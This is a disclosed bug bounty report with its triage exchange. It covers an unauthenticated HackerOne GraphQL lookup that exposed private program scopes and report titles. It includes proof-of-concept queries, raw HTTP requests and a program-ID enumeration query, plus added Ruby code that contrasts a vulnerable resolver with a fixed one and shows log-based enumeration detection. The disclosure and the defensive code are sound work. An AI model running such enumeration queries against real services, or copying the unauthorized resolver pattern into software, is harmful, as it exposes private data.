Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}`
Summary by haxta4ok00
This vulnerability allowed unauthorized users to retrieve sensitive information about private bug bounty programs on HackerOne and the titles of private reports by abusing a GraphQL endpoint.
Attackers could enumerate {id} values and expose private data, including program names, scope details, and the titles of reports belonging to those programs.
The HackerOne team promptly addressed the issue, recognizing its critical severity, and awarded a generous bounty for its discovery.
Timeline
haxta4ok00 submitted a report to HackerOne.
June 28, 2022, 5:29pm UTC
Summary:
Hi team, I understand what's going on
Description:
Just a recent update gives the results of private programs
### Steps To Reproduce
Without authorization
GraphQL:
{"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
Answer:
{"data":{"node":{"id":"Z2lkOi8vaGFja2Vyb25lL1BvbGljeVBhZ2VBc3NldEdyb3Vwc0luZGV4OjpQb2xpY3lQYWdlQXNzZXRHcm91cC8zOTgxLTQxMjg3","name":"██████"}}}
This is Asset program - █████████
Thanks!
Impact
Disclosing Scope (Assets) in Private Programs
menco changed the status to Needs more info.
Updated June 29, 2022, 12:08pm UTC
Hi @haxta4ok00,
Please can you provide the full raw HTTP request to facilitate triage.
Thanks,
@menco
haxta4ok00 changed the status to New.
Updated 14 days ago
Hi @menco -- Burp request, without authorization:
POST /graphql HTTP/2
Host: hackerone.com
Content-Length: 208
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: */*
Content-Type: application/json
Sec-Ch-Ua-Platform: "Windows"
Origin: https://hackerone.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

{"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287\"){... on PolicyPageAssetGroupDocument{id,name,in_scope_count,out_of_scope_count,structured_scopes_count}}}"}
Answer:
{"data":{"node":{"id":"Z2lkOi8vaGFja2Vyb25lL1BvbGljeVBhZ2VBc3NldEdyb3Vwc0luZGV4OjpQb2xpY3lQYWdlQXNzZXRHcm91cC8zOTgxLTQxMjg3","name":"████","in_scope_count":70,"out_of_scope_count":4,"structured_scopes_count":74}}}
menco changed the status to Needs more info.
June 29, 2022, 1:49pm UTC
haxta4ok00 changed the status to New.
Updated 14 days ago
Hi @menco --
1) gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287
1.1) 41287 - ID of the private program, here is █████, you can check this ██████
1.2) 3981 - ID of the PolicyPageAssetGroup of this program
- gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/IDPolicyPageAssetGroup-IDPrivateProgram
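The defect behind this report is the absence of an authorization decision on the object that a `node(id:)` lookup resolves: the global ID is decoded, the record is fetched and returned, and nobody asks whether the caller may see the program it belongs to. The following is an added example, not code from the report or from HackerOne's platform: a plain-Ruby sketch of a global-ID node resolver in the pattern the report describes, beside a hardened version that authorizes against the owning program. The `Program`, `AssetGroup` and `Viewer` structs, the in-memory store, the membership rule and every sample value other than the gid format are assumptions made up for the example.

```ruby
# Added example (not HackerOne's code): an authorization check on a
# GraphQL-style node(id:) lookup for Rails-style global IDs such as
#   gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287
# The data model, the viewer object and the in-memory store are constructed
# for this example; only the ID format comes from the report.

# Constructed records standing in for database rows.
Program    = Struct.new(:id, :handle, :private, :member_ids, keyword_init: true)
AssetGroup = Struct.new(:id, :program_id, :name, :in_scope_count, keyword_init: true)
Viewer     = Struct.new(:user_id, keyword_init: true) # user_id nil => anonymous

PROGRAMS = {
  41287 => Program.new(id: 41287, handle: 'acme-private', private: true,  member_ids: [7]),
  10001 => Program.new(id: 10001, handle: 'acme-public',  private: false, member_ids: []),
}.freeze
ASSET_GROUPS = {
  3981 => AssetGroup.new(id: 3981, program_id: 41287, name: 'Acme internal APIs', in_scope_count: 70),
  1200 => AssetGroup.new(id: 1200, program_id: 10001, name: 'Acme web',           in_scope_count: 5),
}.freeze

ASSET_GROUP_MODEL = 'PolicyPageAssetGroupsIndex::PolicyPageAssetGroup'.freeze
GID_RE = %r{\Agid://(?<app>[^/]+)/(?<model>[^/]+)/(?<id>[^/]+)\z}

# Split a global ID into its app, model name and raw id.
def parse_gid(gid)
  m = GID_RE.match(gid)
  raise ArgumentError, "malformed gid: #{gid}" if m.nil?
  { app: m[:app], model: m[:model], id: m[:id] }
end

# The PolicyPageAssetGroup id is composite, "<asset_group_id>-<program_id>",
# as the report explains. Return both parts as integers.
def split_asset_group_id(raw_id)
  parts = raw_id.split('-', 2)
  unless parts.size == 2 && parts.all? { |p| p.match?(/\A\d+\z/) }
    raise ArgumentError, "composite id expected: #{raw_id}"
  end
  parts.map(&:to_i)
end

# The pattern behind the report: decode the id, fetch the record, return it.
# Nothing asks whether the viewer may see the owning program.
def resolve_node_vulnerable(gid, _viewer)
  parsed = parse_gid(gid)
  return nil unless parsed[:model] == ASSET_GROUP_MODEL
  asset_group_id, _program_id = split_asset_group_id(parsed[:id])
  ASSET_GROUPS[asset_group_id]
end

# A program is visible if it is public or the viewer is one of its members.
def can_view_program?(viewer, program)
  return false if program.nil?
  return true unless program.private
  !viewer.user_id.nil? && program.member_ids.include?(viewer.user_id)
end

# Hardened: authorize against the program the record actually belongs to
# (not the program id the caller placed in the gid), and answer nil for
# both "no such record" and "not allowed" so a sweep over ids cannot tell
# the two cases apart.
def resolve_node_authorized(gid, viewer)
  parsed = parse_gid(gid)
  return nil unless parsed[:model] == ASSET_GROUP_MODEL
  asset_group_id, _program_id = split_asset_group_id(parsed[:id])
  group = ASSET_GROUPS[asset_group_id]
  return nil if group.nil?
  can_view_program?(viewer, PROGRAMS[group.program_id]) ? group : nil
end

if __FILE__ == $PROGRAM_NAME
  gid  = "gid://hackerone/#{ASSET_GROUP_MODEL}/3981-41287"
  anon = Viewer.new(user_id: nil)
  puts "vulnerable resolver, anonymous viewer: #{resolve_node_vulnerable(gid, anon).inspect}"
  puts "authorized resolver, anonymous viewer: #{resolve_node_authorized(gid, anon).inspect}"
  puts "authorized resolver, program member:   #{resolve_node_authorized(gid, Viewer.new(user_id: 7)).inspect}"
end
```

Two design points matter here. The check is made on `group.program_id`, the relationship stored with the record, rather than on the program id embedded in the gid, so a gid that pairs a private asset group with a public program's id gains nothing. And the hardened resolver returns the same `nil` for a forbidden record as for a missing one; returning a distinct "forbidden" error would still let an unauthenticated sweep learn which ids exist.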
menco posted a comment.
July 1, 2022, 9:12am UTC
Hi @haxta4ok00,
How can a malicious actor enumerate these numerical values?
Does the hacker have to try 9999x99999 values to enumerate valid programs?
Thanks,
@menco
haxta4ok00 posted a comment.
July 1, 2022, 9:39am UTC
Hi @menco --
1) What exactly do you want to hear?
2) Have you checked my PoC; is it valid?
If item 2) is correct, could you pass this to the team (by analogy with #1609367)? Thanks!

> Does the hacker have to try 9999x99999 values to enumerate valid programs?

Yes, but right now the H1 platform has 58175 programs (sandboxed, private, public, external). But we are more interested in external programs; their number is even less. I don't know if this request works for fully private programs.
Thanks
menco posted a comment.
July 1, 2022, 4:58pm UTC
Hi @haxta4ok00,
Thank you for your response, the intention behind my message was to confirm that there is no way to more accurately enumerate the IDs.
I've validated the report, and will pass it on internally.
Thanks,
@menco
haxta4ok00 posted a comment.
Updated July 1, 2022, 5:09pm UTC
Hey @menco -- Now I understand you, I should have asked this right away. :)
In our case, since I can't confirm whether this works for fully private programs:
POST /graphql HTTP/2
Host: hackerone.com
Content-Length: 76
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Accept: */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://hackerone.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty

{"query":"{teams(where:{state:{_eq:null}}){total_count,nodes{_id,handle}}}"}
This will give you a list including program IDs, i.e. the second attribute for the enumeration.
Thanks, and have a nice day @menco!
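From the defender's side, the exchange above about how many id values a sweep would need also says what such a sweep looks like in request logs: one unauthenticated client resolving many distinct global ids in a short time, where a normal page load resolves only the handful of ids the page links to. The block below is an added example, not code from the report or from HackerOne: it parses constructed JSON-lines request records (the log format, the client addresses, the user field, the threshold and the timing are all assumptions) and flags anonymous clients that resolve more than a few distinct gids within a minute. The gid shape and the query text are taken from the report.

```ruby
# Added example (not HackerOne's code): spotting id enumeration against a
# GraphQL node(id:) lookup in request logs. The log format, the sample lines
# and the threshold are constructed for this example; the gid shape and the
# query text are the ones shown in the report.
require 'json'
require 'time'

# Constructed JSON-lines records as a GraphQL gateway might write them:
# timestamp, client address, authenticated user (null when anonymous) and
# the query text. 198.51.100.7 sweeps six asset-group ids anonymously,
# 203.0.113.9 is a logged-in member browsing five, 192.0.2.4 repeats two.
SAMPLE_LOG = <<~'LOG'
  {"ts":"2022-06-28T17:20:01Z","ip":"198.51.100.7","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:20:04Z","ip":"198.51.100.7","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3982-41287\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:20:07Z","ip":"198.51.100.7","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3983-41288\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:20:10Z","ip":"198.51.100.7","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3984-41288\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:20:13Z","ip":"198.51.100.7","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3985-41289\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:20:16Z","ip":"198.51.100.7","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3986-41290\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:20:19Z","ip":"198.51.100.7","user":null,"query":"{teams(where:{state:{_eq:null}}){total_count,nodes{_id,handle}}}"}
  {"ts":"2022-06-28T17:21:00Z","ip":"203.0.113.9","user":"7","query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1200-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:21:05Z","ip":"203.0.113.9","user":"7","query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1201-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:21:10Z","ip":"203.0.113.9","user":"7","query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1202-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:21:15Z","ip":"203.0.113.9","user":"7","query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1203-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:21:20Z","ip":"203.0.113.9","user":"7","query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1204-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:22:00Z","ip":"192.0.2.4","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1200-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:22:30Z","ip":"192.0.2.4","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1200-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
  {"ts":"2022-06-28T17:22:45Z","ip":"192.0.2.4","user":null,"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/1201-10001\"){... on PolicyPageAssetGroupDocument{id,name}}}"}
LOG

# Pulls the global id out of a node(id:"...") lookup in the query text.
GID_IN_QUERY = %r{node\(id:\s*"(gid://[^"]+)"}

# Parse each line and keep only requests that resolve a node by global id.
def parse_records(text)
  text.each_line.filter_map do |line|
    r = JSON.parse(line)
    gid = r['query'][GID_IN_QUERY, 1]
    next if gid.nil?
    { ts: Time.iso8601(r['ts']), ip: r['ip'], user: r['user'], gid: gid }
  end
end

# Flag anonymous clients that resolve more than `threshold` distinct gids
# within any `window`-second span. The threshold is a constructed tuning
# value; calibrate it against how many ids a real page load resolves.
def enumeration_suspects(records, threshold: 4, window: 60)
  suspects = []
  anonymous = records.select { |r| r[:user].nil? }
  anonymous.group_by { |r| r[:ip] }.each do |ip, rs|
    sorted = rs.sort_by { |r| r[:ts] }
    sorted.each_with_index do |start, i|
      span = sorted[i..].take_while { |r| r[:ts] - start[:ts] <= window }
      distinct = span.map { |r| r[:gid] }.uniq.size
      next unless distinct > threshold
      suspects << { ip: ip, distinct_ids: distinct, window_start: start[:ts].iso8601 }
      break # one finding per client is enough
    end
  end
  suspects
end

if __FILE__ == $PROGRAM_NAME
  enumeration_suspects(parse_records(SAMPLE_LOG)).each do |s|
    puts "#{s[:ip]} resolved #{s[:distinct_ids]} distinct ids anonymously from #{s[:window_start]}"
  end
end
```

The rule is deliberately scoped to anonymous traffic because that is the condition under which the report's lookups succeeded; once the resolver authorizes properly, the same counter is still useful as an early warning that someone is probing ids, and the response status per request (absent from these constructed lines) is the natural next field to fold in.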
menco posted a comment.
July 1, 2022, 5:15pm UTC
Hi @haxta4ok00,
Understood, that definitely brings down the number of possible numerical values.
Thank you for the further explanation,
@menco
HackerOne staff changed the status to Triaged.
Thanks @haxta4ok00, we'll look into this!
July 1, 2022, 5:21pm UTC
HackerOne staff closed the report and changed the status to Resolved.
HackerOne staff updated the severity from high (7.7) to critical (9.3).
Hi @haxta4ok00 - thanks again for bringing this to our attention. After our internal investigation, the team determined that this vulnerability could have been used to access the titles of reports. Because of that we're increasing the severity to critical. The incident response team determined that this vulnerability was not exploited other than you proving the existence of it for this report.
HackerOne staff rewarded haxta4ok00 with a $25,000 bounty.
July 5, 2022, 4:15pm UTC
haxta4ok00 posted a comment.
July 5, 2022, 5:59pm UTC
Hi @jobert -- WoW, thank you for the bounty!
haxta4ok00 requested to disclose this report.
January 6, 2025, 8:39am UTC
Hi team, @jobert -- Happy new year!
After a long time, can we disclose this report?
Thanks!
haxta4ok00 posted a comment.
Updated 14 days ago
Hi, it looks like the report is ready after editing. :)
Thanks!
HackerOne staff agreed to disclose this report.
This report has been disclosed.
14 days ago